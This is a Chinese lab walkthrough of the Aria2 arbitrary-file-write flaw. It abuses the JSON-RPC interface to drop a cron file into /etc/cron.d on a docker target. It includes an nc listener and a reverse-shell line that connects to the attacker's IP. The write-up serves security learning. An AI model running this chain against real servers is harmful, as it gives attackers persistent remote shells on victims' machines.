Aria2 任意文件写入漏洞

Aria2是一个轻量级，多协议，多源下载工具（支持HTTP / HTTPS，FTP，BitTorrent，metalink），内置XML-RPC和JSON-RPC接口。我们可以使用RPC接口来操作aria2并将文件下载到任何目录，从而导致任意文件写入漏洞。

参考文章：

https://paper.seebug.org/120/

（1）打开靶场环境

docker-compose up -d

（2）因为 rpc 通信需要 json 或 xml，所以不方便，所以我们可以使用第三方 UI 与目标进行通信，比如：

http://binux.github.io/yaaw/demo/

 （3）点击标红位置，进行配置

http://靶机IP地址:6800/jsonrpc

 （4）进行设置下载连接，填写URL，以及设置靶机的路径

http://攻击机IP地址

 显示下载成功

 （5）确定添加后，可以到容器下查看，文件成功下载到指定目录

docker exec -it ac44a6306573 bash

cd /etc/cron.d

ls

cat shell1

 （6）在被反弹shell的攻击机下监听端口

nc -lvp port

bash -i >& /dev/tcp/10.222.23.99/9999 0>&1

反弹shell成功！

（7） 关闭靶场环境

docker-compose down